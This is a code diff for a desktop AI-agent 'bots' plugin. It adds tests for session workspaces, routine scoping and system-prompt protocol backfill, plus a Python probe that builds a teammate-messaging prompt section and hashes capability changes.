+test('loadRoutines forwards a profile scope to cron.manage list + pause', () => {
+  const fn = source.slice(source.indexOf('async function loadRoutines('), source.indexOf('function useRoutines('))
+  assert.match(fn, /const scope = profile \? \{ profile \} : \{\}/)
+  // list call spreads the scope
+  assert.match(fn, /action: 'list', include_disabled: true, \.\.\.scope/)
+  // legacy-pause call spreads the scope too
+  assert.match(fn, /action: 'pause', name: job\.job_id, \.\.\.scope/)
+})
+
+test('useRoutines is bot-keyed so switching bots refetches', () => {
+  assert.match(source, /queryKey: \[\.\.\.ROUTINES_KEY, profile \|\| ''\]/)
+  assert.match(source, /queryFn: \(\) => loadRoutines\(profile\)/)
+})
+
+test('RoutineRow toggle and create forward the profile scope', () => {
+  // RoutineRow pause/resume
+  assert.match(source, /action, name: job\.job_id, \.\.\.\(profile \? \{ profile \} : \{\}\)/)
+  // create
+  assert.match(source, /\.\.\.\(bot \? \{ profile: bot \} : \{\}\)/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/session-workspace.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/session-workspace.test.mjs
@@ -1,0 +1,144 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+const plain = value => JSON.parse(JSON.stringify(value))
+
+function load({ profile = 'ops', request, openSession } = {}) {
+  const values = new Map()
+  const atom = initial => {
+    const slot = {
+      get: () => values.get(slot),
+      set: value => values.set(slot, typeof value === 'function' ? value(values.get(slot)) : value)
+    }
+    values.set(slot, initial)
+    return slot
+  }
+  const calls = []
+  const host = {
+    state: {
+      profile: { get: () => profile, listen: () => undefined },
+      gateway: { get: () => 'open', listen: () => undefined }
+    },
+    request: async (method, params) => {
+      calls.push([method, params])
+      return request?.(method, params)
+    },
+    openSession: async (...args) => {
+      calls.push(['openSession', ...args])
+      return openSession?.(...args)
+    },
+    newChat: (...args) => calls.push(['newChat', ...args]),
+    notify: () => undefined,
+    notifyError: () => undefined
+  }
+  const context = {
+    atom,
+    host,
+    PALETTE_AREA: 'palette',
+    COMPOSER_AREAS: { middleware: 'middleware' },
+    document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } }
+  }
+  const source = pluginSource
+    .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat(`\nglobalThis.__sessions = {
+      openBotSessionsWorkspace,
+      openProfileSession,
+      filterProfileSessions,
+      $botSessionsWorkspace,
+      $botSelectedSessions,
+      $sessionsGatewayGeneration,
+      handleSessionsGatewayTransition
+      };\n`)
+  vm.runInNewContext(source, context, { filename: 'plugin.js' })
+  return { ...context, calls }
+}
+
+test('sessions workspace: selecting the secondary workspace does not navigate', () => {
+  const runtime = load()
+  runtime.__sessions.openBotSessionsWorkspace({ name: 'ops' })
+  assert.equal(runtime.__sessions.$botSessionsWorkspace.get(), 'ops')
+  assert.equal(runtime.calls.some(([method]) => method === 'openSession'), false)
+})
+
+test('sessions workspace: invalid profile names are ignored', () => {
+  const runtime = load()
+  runtime.__sessions.openBotSessionsWorkspace({ name: '../ops' })
+  assert.equal(runtime.__sessions.$botSessionsWorkspace.get(), null)
+})
+
+test('sessions workspace: filtering searches title, preview, and source without privileged rows', () => {
+  const { filterProfileSessions } = load().__sessions
+  const rows = [
+    { id: 'named', title: 'Oversight', preview: 'ordinary user session', source: 'user' },
+    { id: 'deploy', title: 'Deploy API', preview: 'shipping', source: 'cli' },
+    { id: 'docs', title: 'Write docs', preview: 'guide', source: 'desktop' }
+  ]
+  assert.deepEqual(plain(filterProfileSessions(rows, '').map(row => row.id)), ['named', 'deploy', 'docs'])
+  assert.deepEqual(plain(filterProfileSessions(rows, 'ship').map(row => row.id)), ['deploy'])
+  assert.deepEqual(plain(filterProfileSessions(rows, 'DESKTOP').map(row => row.id)), ['docs'])
+})
+
+test('sessions workspace: opening a stored row uses profile-aware navigation and records selection', async () => {
+  const runtime = load({ profile: 'default' })
+  await runtime.__sessions.openProfileSession('ops', 'stored-123', 0)
+  assert.deepEqual(plain(runtime.calls), [['openSession', 'stored-123', { profile: 'ops' }]])
+  assert.equal(runtime.__sessions.$botSelectedSessions.get().ops, 'stored-123')
+})
+
+test('sessions workspace: malformed profile or session input is a no-op', async () => {
+  const runtime = load()
+  await runtime.__sessions.openProfileSession('../ops', 'stored-123', 0)
+  await runtime.__sessions.openProfileSession('ops', '', 0)
+  assert.deepEqual(runtime.calls, [])
+})
+
+test('sessions workspace: a gateway lifecycle change clears selection and rejects stale row clicks', async () => {
+  const runtime = load()
+  runtime.__sessions.$botSelectedSessions.set({ ops: 'stored-123' })
+  runtime.__sessions.handleSessionsGatewayTransition()
+  assert.equal(runtime.__sessions.$sessionsGatewayGeneration.get(), 1)
+  assert.deepEqual(plain(runtime.__sessions.$botSelectedSessions.get()), {})
+
+  await runtime.__sessions.openProfileSession('ops', 'stored-123', 0)
+  assert.deepEqual(runtime.calls, [])
+})
+
+test('sessions workspace: an in-flight open cannot restore selection after gateway replacement', async () => {
+  let runtime
+  runtime = load({
+    openSession: async () => runtime.__sessions.handleSessionsGatewayTransition()
+  })
+
+  await runtime.__sessions.openProfileSession('ops', 'stored-123', 0)
+  assert.equal(runtime.calls.length, 1)
+  assert.deepEqual(plain(runtime.__sessions.$botSelectedSessions.get()), {})
+})
+
+test('source contract: the primary bot click keeps canonical chat while Sessions is secondary', () => {
+  assert.match(pluginSource, /const open = async \(\) => \{[\s\S]*openBotCanonicalChat\(bot\.name, meta\?\.chat\)/)
+  assert.match(pluginSource, /openBotSessionsWorkspace\(bot\)[\s\S]*children: 'Sessions'/)
+})
+
+test('source contract: workspaces disclose the bounded recent-session inventory', () => {
+  assert.match(pluginSource, /queryKey: \[ID, 'profile-sessions', botName, gatewayGeneration\]/)
+  assert.match(pluginSource, /enabled: Boolean\(botName\)/)
+  assert.match(pluginSource, /host\.request\('session\.list', \{ profile: botName, limit: PROFILE_SESSION_LIST_LIMIT \}\)/)
+  assert.match(pluginSource, /Showing the \$\{PROFILE_SESSION_LIST_LIMIT\} most recent sessions\./)
+  assert.match(pluginSource, /No matching sessions in the \$\{PROFILE_SESSION_LIST_LIMIT\} most recent\./)
+  assert.doesNotMatch(pluginSource, /children: 'Activate profile'/)
+  assert.match(pluginSource, /host\.state\.gateway\.listen\(handleSessionsGatewayTransition\)/)
+})
+
+test('source contract: session controls expose filter and selection state to assistive technology', () => {
+  assert.match(pluginSource, /'aria-label': 'Filter sessions'/)
+  assert.match(pluginSource, /'aria-current': active \? 'page' : undefined/)
+})
+

--- a/apps/desktop/src/plugins/hermes-bots/tests/single-flight.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/single-flight.test.mjs
@@ -1,0 +1,61 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function loadSingleFlight() {
+  const start = pluginSource.indexOf('function singleFlight(')
+  const end = pluginSource.indexOf('/** The agent-to-agent messaging protocol', start)
+  assert.notEqual(start, -1, 'plugin exports the single-flight helper source')
+  assert.notEqual(end, -1, 'single-flight helper has a stable source boundary')
+  const context = {}
+  vm.runInNewContext(`${pluginSource.slice(start, end)}\nglobalThis.singleFlight = singleFlight`, context)
+  return context.singleFlight
+}
+
+test('concurrent callers share one in-flight profile creation', async () => {
+  const singleFlight = loadSingleFlight()
+  const ref = { current: null }
+  let calls = 0
+  let release
+  const pending = new Promise(resolve => {
+    release = resolve
+  })
+  const create = async () => {
+    calls += 1
+    await pending
+    return 'researcher'
+  }
+
+  const first = singleFlight(ref, create)
+  const second = singleFlight(ref, create)
+
+  assert.equal(calls, 1)
+  assert.equal(first, second)
+  release()
+  assert.equal(await first, 'researcher')
+  assert.equal(ref.current, first)
+})
+
+test('a failed creation clears the flight so retry can succeed', async () => {
+  const singleFlight = loadSingleFlight()
+  const ref = { current: null }
+  let calls = 0
+
+  await assert.rejects(
+    singleFlight(ref, async () => {
+      calls += 1
+      throw new Error('gateway unavailable')
+    }),
+    /gateway unavailable/
+  )
+
+  assert.equal(ref.current, null)
+  assert.equal(await singleFlight(ref, async () => {
+    calls += 1
+    return 'researcher'
+  }), 'researcher')
+  assert.equal(calls, 2)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/soul-protocol-backfill.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/soul-protocol-backfill.test.mjs
@@ -6,7 +6,7 @@ import vm from 'node:vm'
 const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
 
 function loadSoulHelpers({ serverInjects = false } = {}) {
-  const start = source.indexOf('function botHandle(name) {')
+  const start = source.indexOf('function botHandle(name')
   const end = source.indexOf('// ── human-readable row helpers', start)
   assert.notEqual(start, -1, 'botHandle is missing')
   assert.notEqual(end, -1, 'soul-helper section delimiter is missing')

--- a/apps/desktop/src/plugins/hermes-bots/tests/soul-protocol-backfill.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/soul-protocol-backfill.test.mjs
@@ -1,0 +1,141 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function loadSoulHelpers({ serverInjects = false } = {}) {
+  const start = source.indexOf('function botHandle(name) {')
+  const end = source.indexOf('// ── human-readable row helpers', start)
+  assert.notEqual(start, -1, 'botHandle is missing')
+  assert.notEqual(end, -1, 'soul-helper section delimiter is missing')
+  const context = { serverInjectsProtocol: serverInjects }
+  vm.runInNewContext(
+    `${source.slice(start, end)}\nObject.assign(globalThis, { botHandle, hasMessagingProtocol, ensureMessagingProtocol, composeSoul, messagingProtocolSection })`,
+    context
+  )
+  return context
+}
+
+const EXISTING_SOUL = `# Main agent
+
+I am the default profile on this machine.
+
+## Notes
+- Execute directly.
+`
+
+test('generated protocol uses hermes profile list, not the invalid profiles plural', () => {
+  assert.match(source, /run `hermes profile list` for the LIVE/)
+  assert.doesNotMatch(source, /run `hermes profiles list` for the LIVE/)
+})
+
+test('pre-existing custom SOUL is detected as missing the protocol', () => {
+  const { hasMessagingProtocol } = loadSoulHelpers()
+  assert.equal(hasMessagingProtocol(EXISTING_SOUL), false)
+  assert.equal(hasMessagingProtocol(''), false)
+  assert.equal(hasMessagingProtocol('# Bot\n\n## Messaging other agents\n\nYou work alongside'), true)
+})
+
+test('ensureMessagingProtocol appends once and does not duplicate', () => {
+  const { ensureMessagingProtocol, hasMessagingProtocol } = loadSoulHelpers()
+  const roster = [
+    { name: 'default', description: 'main agent' },
+    { name: 'researcher', description: 'research specialist' }
+  ]
+  const once = ensureMessagingProtocol(EXISTING_SOUL, 'default', roster)
+  assert.equal(hasMessagingProtocol(once), true)
+  assert.match(once, /I am the default profile on this machine/)
+  assert.match(once, /`researcher` — research specialist/)
+  assert.match(once, /@hermes/)
+  assert.doesNotMatch(once, /@default/)
+
+  const twice = ensureMessagingProtocol(once, 'default', roster)
+  assert.equal(twice, once.trim())
+  assert.equal(twice.split('## Messaging other agents').length, 2)
+})
+
+test('composeSoul does not double-append when custom SOUL already has the protocol', () => {
+  const { composeSoul } = loadSoulHelpers()
+  const roster = [{ name: 'researcher' }, { name: 'default' }]
+  const withProtocol = composeSoul({
+    name: 'researcher',
+    title: 'Researcher',
+    description: 'literature review',
+    roster,
+    customSoul: ''
+  })
+  const cloned = composeSoul({
+    name: 'researcher',
+    roster,
+    customSoul: withProtocol
+  })
+  assert.equal(cloned.split('## Messaging other agents').length, 2)
+})
+
+test('backfill is one-shot: describe-only when protocol exists, configure when missing', async () => {
+  const start = source.indexOf('const soulProtocolChecked = new Set()')
+  const end = source.indexOf('/** SOUL.md for a new bot:', start)
+  assert.notEqual(start, -1)
+  assert.notEqual(end, -1)
+
+  const calls = []
+  const context = {
+    serverInjectsProtocol: false,
+    soulProtocolChecked: new Set(),
+    soulProtocolInflight: new Set(),
+    hasMessagingProtocol: soul => /## Messaging other agents/.test(soul || ''),
+    ensureMessagingProtocol: soul => `${soul}\n\n## Messaging other agents\n`,
+    host: {
+      request: async (method, payload) => {
+        calls.push({ method, payload })
+        if (method === 'profiles.describe') {
+          if (payload.name === 'researcher') return { soul: '# Researcher\n\n## Messaging other agents\n' }
+          return { soul: EXISTING_SOUL }
+        }
+        return { ok: true }
+      }
+    }
+  }
+
+  vm.runInNewContext(
+    `${source.slice(start, end)}\nbackfillMessagingProtocol(roster)`,
+    { ...context, roster: [{ name: 'default' }, { name: 'researcher' }] }
+  )
+
+  await new Promise(resolve => setTimeout(resolve, 0))
+  await new Promise(resolve => setTimeout(resolve, 0))
+
+  const describes = calls.filter(c => c.method === 'profiles.describe').map(c => c.payload.name)
+  const configures = calls.filter(c => c.method === 'profiles.configure')
+  assert.deepEqual(describes.sort(), ['default', 'researcher'])
+  assert.equal(configures.length, 1)
+  assert.equal(configures[0].payload.name, 'default')
+  assert.match(configures[0].payload.soul, /## Messaging other agents/)
+})
+
+test('backend bot_mode_protocol capability suppresses every SOUL protocol write', async () => {
+  // ensureMessagingProtocol becomes identity — custom SOULs stay untouched.
+  const helpers = loadSoulHelpers({ serverInjects: true })
+  assert.equal(helpers.ensureMessagingProtocol(EXISTING_SOUL, 'default', []), EXISTING_SOUL.trim())
+
+  // backfill never issues a single RPC.
+  const start = source.indexOf('const soulProtocolChecked = new Set()')
+  const end = source.indexOf('/** SOUL.md for a new bot:', start)
+  const calls = []
+  vm.runInNewContext(
+    `${source.slice(start, end)}\nbackfillMessagingProtocol(roster)`,
+    {
+      serverInjectsProtocol: true,
+      soulProtocolChecked: new Set(),
+      soulProtocolInflight: new Set(),
+      hasMessagingProtocol: () => false,
+      ensureMessagingProtocol: soul => soul,
+      host: { request: async (method, payload) => (calls.push({ method, payload }), { ok: true }) },
+      roster: [{ name: 'default' }, { name: 'researcher' }]
+    }
+  )
+  await new Promise(resolve => setTimeout(resolve, 0))
+  assert.equal(calls.length, 0)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/soul-protocol-backfill.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/soul-protocol-backfill.test.mjs
@@ -138,4 +138,8 @@ test('backend bot_mode_protocol capability suppresses every SOUL protocol write'
   )
   await new Promise(resolve => setTimeout(resolve, 0))
   assert.equal(calls.length, 0)
+
+  // composeSoul's generated-identity path also skips the section.
+  const generated = helpers.composeSoul({ name: 'newbot', title: 'T', description: 'D', roster: [], customSoul: '' })
+  assert.doesNotMatch(generated, /## Messaging other agents/)
 })

--- a/hermes_cli/config_defaults.py
+++ b/hermes_cli/config_defaults.py
@@ -163,6 +163,9 @@ DEFAULT_CONFIG = {
         # (docker/modal/ssh — they have their own probe).  Set False to
         # disable entirely.
         "environment_probe": True,
+        # Bot Mode teammate-messaging protocol section (silent unless a
+        # profile is managed by the desktop's Bot Mode).
+        "bot_mode_protocol": True,
         # Embedder-supplied environment description appended to the system
         # prompt's environment-hints block. Lets a host that wraps Hermes
         # (sandbox runner, managed platform) explain the runtime environment

--- a/tests/tools/test_bot_mode_probe.py
+++ b/tests/tools/test_bot_mode_probe.py
@@ -1,0 +1,103 @@
+"""Tests for tools/bot_mode_probe.py — the Bot Mode teammate-protocol section."""
+
+import textwrap
+
+import pytest
+
+from tools import bot_mode_probe
+
+
+@pytest.fixture(autouse=True)
+def _fresh_cache():
+    bot_mode_probe._reset_cache_for_tests()
+    yield
+    bot_mode_probe._reset_cache_for_tests()
+
+
+def _make_bot_profile(root, name, *, managed=True, soul=None):
+    d = root / "profiles" / name
+    d.mkdir(parents=True, exist_ok=True)
+    if managed:
+        (d / "profile.yaml").write_text(
+            textwrap.dedent(
+                """\
+                ui_meta:
+                  hermes-bots:
+                    shape: cloud
+                    color: '#8b5cf6'
+                """
+            ),
+            encoding="utf-8",
+        )
+    if soul is not None:
+        (d / "SOUL.md").write_text(soul, encoding="utf-8")
+    return d
+
+
+def test_silent_when_no_profile_is_bot_managed(tmp_path):
+    home = tmp_path / ".hermes"
+    home.mkdir()
+    _make_bot_profile(home, "researcher", managed=False)
+    assert bot_mode_probe.get_bot_mode_protocol_section(home) == ""
+
+
+def test_emits_for_default_when_any_profile_is_managed(tmp_path):
+    home = tmp_path / ".hermes"
+    home.mkdir()
+    _make_bot_profile(home, "researcher", managed=True)
+
+    section = bot_mode_probe.get_bot_mode_protocol_section(home)
+    assert section.startswith("## Messaging other agents")
+    # default's callable alias is @hermes, never @default
+    assert "@hermes" in section
+    assert "@default" not in section
+    assert "`researcher`" in section
+    assert "hermes profile list" in section
+
+
+def test_emits_for_named_profile_with_own_handle(tmp_path):
+    home = tmp_path / ".hermes"
+    home.mkdir()
+    profile_dir = _make_bot_profile(home, "coder", managed=True)
+
+    section = bot_mode_probe.get_bot_mode_protocol_section(profile_dir)
+    assert "@coder" in section
+    # teammate list excludes self, includes default
+    assert "`default`" in section
+    assert "`coder`" not in section.split("Teammates at session start:")[1]
+
+
+def test_silent_when_soul_already_carries_protocol(tmp_path):
+    """Legacy plugin-side append — never double the section."""
+    home = tmp_path / ".hermes"
+    home.mkdir()
+    _make_bot_profile(home, "coder", managed=True)
+    (home / "SOUL.md").write_text(
+        "# Me\n\n## Messaging other agents\nold plugin text\n", encoding="utf-8"
+    )
+    assert bot_mode_probe.get_bot_mode_protocol_section(home) == ""
+
+
+def test_deterministic_across_calls(tmp_path):
+    home = tmp_path / ".hermes"
+    home.mkdir()
+    _make_bot_profile(home, "researcher", managed=True)
+    first = bot_mode_probe.get_bot_mode_protocol_section(home)
+    # Even if the filesystem changes, the cached result must be byte-stable
+    # for the life of the process (prompt-cache invariant).
+    _make_bot_profile(home, "newbot", managed=True)
+    second = bot_mode_probe.get_bot_mode_protocol_section(home)
+    assert first == second
+
+
+def test_never_raises_on_garbage(tmp_path, monkeypatch):
+    home = tmp_path / ".hermes"
+    home.mkdir()
+    profiles = home / "profiles" / "bad"
+    profiles.mkdir(parents=True)
+    (profiles / "profile.yaml").write_text("ui_meta: [unclosed", encoding="utf-8")
+    assert isinstance(bot_mode_probe.get_bot_mode_protocol_section(home), str)
+
+    monkeypatch.setattr(bot_mode_probe, "_roster", lambda root: (_ for _ in ()).throw(OSError("boom")))
+    bot_mode_probe._reset_cache_for_tests()
+    assert bot_mode_probe.get_bot_mode_protocol_section(home) == ""

--- a/tests/tools/test_bot_mode_probe.py
+++ b/tests/tools/test_bot_mode_probe.py
@@ -169,3 +169,34 @@ def test_stored_prompt_staleness(tmp_path):
     # prompts without a stamp (every non-Bot-Chat session) are never stale
     assert not bot_mode_probe.stored_prompt_capability_stale("ordinary prompt", home)
     assert not bot_mode_probe.stored_prompt_capability_stale("", home)
+
+
+def test_legacy_bot_chat_upgrade(tmp_path):
+    home = tmp_path / ".hermes"
+    home.mkdir()
+    _make_bot_profile(home, "researcher", managed=True)
+
+    legacy = "old prompt with no protocol and no stamp"
+    # legacy Bot Chat on a managed install → upgrade once
+    assert bot_mode_probe.stored_bot_chat_prompt_needs_upgrade(legacy, home)
+
+    # a rebuilt prompt (stamped) never re-fires
+    upgraded = legacy + "\n\n" + bot_mode_probe.get_bot_mode_protocol_section(home) + "\n\n" + bot_mode_probe.epoch_line(home)
+    assert not bot_mode_probe.stored_bot_chat_prompt_needs_upgrade(upgraded, home)
+
+    # SOUL already carries the legacy plugin-side append → probe silent →
+    # no upgrade (rebuilding would loop: the new prompt would be unstamped too)
+    bot_mode_probe._reset_cache_for_tests()
+    (home / "SOUL.md").write_text("# Me\n\n## Messaging other agents\nlegacy\n", encoding="utf-8")
+    assert not bot_mode_probe.stored_bot_chat_prompt_needs_upgrade(legacy, home)
+
+    # prompt whose SOUL section rode into it → protocol heading present → no upgrade
+    assert not bot_mode_probe.stored_bot_chat_prompt_needs_upgrade(
+        "prompt containing\n## Messaging other agents\nfrom SOUL", home
+    )
+
+    # unmanaged install → probe silent → never upgrades
+    bot_mode_probe._reset_cache_for_tests()
+    home2 = tmp_path / ".hermes2"
+    home2.mkdir()
+    assert not bot_mode_probe.stored_bot_chat_prompt_needs_upgrade(legacy, home2)

--- a/tests/tools/test_bot_mode_probe.py
+++ b/tests/tools/test_bot_mode_probe.py
@@ -101,3 +101,71 @@ def test_never_raises_on_garbage(tmp_path, monkeypatch):
     monkeypatch.setattr(bot_mode_probe, "_roster", lambda root: (_ for _ in ()).throw(OSError("boom")))
     bot_mode_probe._reset_cache_for_tests()
     assert bot_mode_probe.get_bot_mode_protocol_section(home) == ""
+
+
+# ── capability epoch ─────────────────────────────────────────────────────────
+
+
+def test_fingerprint_stable_when_nothing_changes(tmp_path):
+    home = tmp_path / ".hermes"
+    home.mkdir()
+    _make_bot_profile(home, "researcher", managed=True)
+    assert bot_mode_probe.capability_fingerprint(home) == bot_mode_probe.capability_fingerprint(home)
+
+
+def test_fingerprint_changes_on_each_capability_axis(tmp_path):
+    home = tmp_path / ".hermes"
+    home.mkdir()
+    _make_bot_profile(home, "researcher", managed=True)
+    base = bot_mode_probe.capability_fingerprint(home)
+
+    # new skill installed
+    skill = home / "skills" / "web" / "scraping"
+    skill.mkdir(parents=True)
+    (skill / "SKILL.md").write_text("---\nname: scraping\n---\n", encoding="utf-8")
+    after_skill = bot_mode_probe.capability_fingerprint(home)
+    assert after_skill != base
+
+    # toolset pin changed
+    (home / "config.yaml").write_text("tools:\n  enabled_toolsets: [web]\n", encoding="utf-8")
+    after_tools = bot_mode_probe.capability_fingerprint(home)
+    assert after_tools != after_skill
+
+    # MCP server added
+    (home / "config.yaml").write_text(
+        "tools:\n  enabled_toolsets: [web]\nmcp_servers:\n  github:\n    preset: github\n",
+        encoding="utf-8",
+    )
+    after_mcp = bot_mode_probe.capability_fingerprint(home)
+    assert after_mcp != after_tools
+
+    # SOUL edited
+    (home / "SOUL.md").write_text("# New identity\n", encoding="utf-8")
+    after_soul = bot_mode_probe.capability_fingerprint(home)
+    assert after_soul != after_mcp
+
+    # teammate added to the roster
+    _make_bot_profile(home, "coder", managed=True)
+    assert bot_mode_probe.capability_fingerprint(home) != after_soul
+
+
+def test_stored_prompt_staleness(tmp_path):
+    home = tmp_path / ".hermes"
+    home.mkdir()
+    _make_bot_profile(home, "researcher", managed=True)
+
+    stamped = "system stuff\n\n" + bot_mode_probe.epoch_line(home)
+    # unchanged surface → not stale (cache preserved)
+    assert not bot_mode_probe.stored_prompt_capability_stale(stamped, home)
+
+    # capability change → stale exactly once
+    skill = home / "skills" / "new-skill"
+    skill.mkdir(parents=True)
+    (skill / "SKILL.md").write_text("---\nname: new-skill\n---\n", encoding="utf-8")
+    assert bot_mode_probe.stored_prompt_capability_stale(stamped, home)
+    restamped = "system stuff\n\n" + bot_mode_probe.epoch_line(home)
+    assert not bot_mode_probe.stored_prompt_capability_stale(restamped, home)
+
+    # prompts without a stamp (every non-Bot-Chat session) are never stale
+    assert not bot_mode_probe.stored_prompt_capability_stale("ordinary prompt", home)
+    assert not bot_mode_probe.stored_prompt_capability_stale("", home)

--- a/tools/bot_mode_probe.py
+++ b/tools/bot_mode_probe.py
@@ -158,6 +158,108 @@ def get_bot_mode_protocol_section(home: str | os.PathLike | None = None, *, forc
         return _cached[resolved]
 
 
+# ── capability epoch ─────────────────────────────────────────────────────────
+#
+# Bot Chat sessions are effectively eternal — the "new sessions come along
+# often" assumption behind build-once system prompts does not hold. When the
+# user changes a bot's capabilities (skills, toolsets, MCP servers, SOUL) or
+# the teammate roster changes, they expect the change to work on the NEXT
+# message. The fingerprint below hashes exactly that capability surface; the
+# built Bot Chat prompt embeds it, and the restore path in
+# agent/conversation_loop.py rebuilds the prompt when the stored epoch no
+# longer matches the disk state. This is the /model exception applied to
+# capabilities: a LOUD, USER-INITIATED, once-per-change cache break — never
+# a per-turn drift (unchanged state hashes identically and the stored bytes
+# are reused verbatim).
+
+_EPOCH_PREFIX = "Capability epoch: "
+_EPOCH_RE_TEXT = r"Capability epoch: ([0-9a-f]{12})"
+
+
+def capability_fingerprint(home: str | os.PathLike | None = None) -> str:
+    """12-hex digest of the capability surface for ``home``'s profile.
+
+    Sources: the profile's disabled skills + enabled toolsets + MCP server
+    config (config.yaml), SOUL.md bytes, installed skill names, and the
+    Bot-Mode roster (managed profile names). Deliberately NOT cached — the
+    whole point is detecting on-disk drift; callers compare it against the
+    epoch embedded in a stored prompt. Never raises.
+    """
+    import hashlib
+    import json
+
+    resolved = Path(str(home) if home else (os.getenv("HERMES_HOME") or os.path.expanduser("~/.hermes")))
+    surface: dict = {}
+    try:
+        import yaml
+
+        cfg_path = resolved / "config.yaml"
+        cfg = {}
+        if cfg_path.is_file():
+            cfg = yaml.safe_load(cfg_path.read_text(encoding="utf-8", errors="replace")) or {}
+        skills_cfg = cfg.get("skills") if isinstance(cfg.get("skills"), dict) else {}
+        tools_cfg = cfg.get("tools") if isinstance(cfg.get("tools"), dict) else {}
+        skills_cfg = skills_cfg or {}
+        tools_cfg = tools_cfg or {}
+        surface["disabled_skills"] = sorted(str(s).lower() for s in (skills_cfg.get("disabled") or []))
+        surface["enabled_toolsets"] = sorted(str(t) for t in (tools_cfg.get("enabled_toolsets") or []))
+        mcp = cfg.get("mcp_servers")
+        surface["mcp"] = json.dumps(mcp, sort_keys=True, default=str) if isinstance(mcp, dict) else ""
+    except Exception:
+        pass
+    try:
+        soul = resolved / "SOUL.md"
+        surface["soul"] = hashlib.sha256(soul.read_bytes()).hexdigest() if soul.is_file() else ""
+    except Exception:
+        surface["soul"] = ""
+    try:
+        names = []
+        skills_root = resolved / "skills"
+        if skills_root.is_dir():
+            for skill_md in skills_root.glob("**/SKILL.md"):
+                names.append(str(skill_md.parent.relative_to(skills_root)))
+        surface["skills"] = sorted(names)
+    except Exception:
+        surface["skills"] = []
+    try:
+        root = _hermes_root(resolved)
+        surface["roster"] = sorted(n for n, d in _roster(root) if _is_bot_managed(d))
+    except Exception:
+        surface["roster"] = []
+    try:
+        blob = json.dumps(surface, sort_keys=True).encode("utf-8")
+        return hashlib.sha256(blob).hexdigest()[:12]
+    except Exception:
+        return "unavailable"
+
+
+def epoch_line(home: str | os.PathLike | None = None) -> str:
+    """The epoch stamp appended to a Bot Chat prompt."""
+    return f"{_EPOCH_PREFIX}{capability_fingerprint(home)}"
+
+
+def stored_prompt_capability_stale(stored_prompt: str, home: str | os.PathLike | None = None) -> bool:
+    """True when ``stored_prompt`` is a Bot Chat prompt whose embedded
+    capability epoch no longer matches the current disk state.
+
+    Non-Bot-Chat prompts (no epoch stamp) are never stale by this check.
+    Fails closed to "not stale" — a broken probe must never turn into a
+    rebuild-every-turn cache burner.
+    """
+    import re
+
+    try:
+        m = re.search(_EPOCH_RE_TEXT, stored_prompt or "")
+        if not m:
+            return False
+        current = capability_fingerprint(home)
+        if current == "unavailable":
+            return False
+        return m.group(1) != current
+    except Exception:
+        return False
+
+
 def _reset_cache_for_tests() -> None:
     with _lock:
         _cached.clear()

--- a/tools/bot_mode_probe.py
+++ b/tools/bot_mode_probe.py
@@ -1,0 +1,153 @@
+"""Bot Mode roster probe — stable-tier system prompt section.
+
+When the desktop's Bot Mode manages this install (any profile carries a
+``ui_meta['hermes-bots']`` block in its profile.yaml), every session of every
+profile gets a short "Messaging other agents" section so bots can hand off
+@mentions and reply to bot-to-bot DMs — including headless CLI sessions
+started by another bot via ``hermes -p <name> chat``.
+
+This replaces the plugin-side SOUL.md backfill: the protocol is injected by
+the core at prompt-build time instead of appended to user-authored SOUL
+files.  If the profile's SOUL.md already carries the section (created by an
+older plugin version), the probe stays silent so the text never doubles up.
+
+Silent (returns ``""``) when:
+- no profile on this install is Bot-Mode-managed (the dominant case),
+- the current profile's SOUL.md already contains the protocol heading,
+- anything at all goes wrong (never crash a prompt build).
+
+Deterministic within a process: the result is computed once and cached, so
+compression-triggered prompt rebuilds produce identical bytes.
+
+Toggle via ``agent.bot_mode_protocol`` in config.yaml (default True).
+"""
+
+from __future__ import annotations
+
+import os
+import threading
+from pathlib import Path
+
+_PROTOCOL_HEADING = "## Messaging other agents"
+
+_lock = threading.Lock()
+_cached: dict[str, str] = {}
+
+
+def _hermes_root(home: Path) -> Path:
+    """Root ~/.hermes for both the default profile and named profiles."""
+    if home.parent.name == "profiles":
+        return home.parent.parent
+    return home
+
+
+def _profile_name(home: Path) -> str:
+    if home.parent.name == "profiles":
+        return home.name
+    return "default"
+
+
+def _is_bot_managed(profile_dir: Path) -> bool:
+    """True when profile.yaml carries a ui_meta['hermes-bots'] block.
+
+    Cheap substring check before the YAML parse keeps the silent path fast.
+    """
+    meta = profile_dir / "profile.yaml"
+    try:
+        if not meta.is_file():
+            return False
+        raw = meta.read_text(encoding="utf-8", errors="replace")
+        if "hermes-bots" not in raw:
+            return False
+        import yaml
+
+        data = yaml.safe_load(raw)
+        ui_meta = data.get("ui_meta") if isinstance(data, dict) else None
+        return isinstance(ui_meta, dict) and isinstance(ui_meta.get("hermes-bots"), dict)
+    except Exception:
+        return False
+
+
+def _roster(root: Path) -> list[tuple[str, Path]]:
+    """(name, dir) for the default profile + every named profile."""
+    entries: list[tuple[str, Path]] = [("default", root)]
+    try:
+        profiles = root / "profiles"
+        if profiles.is_dir():
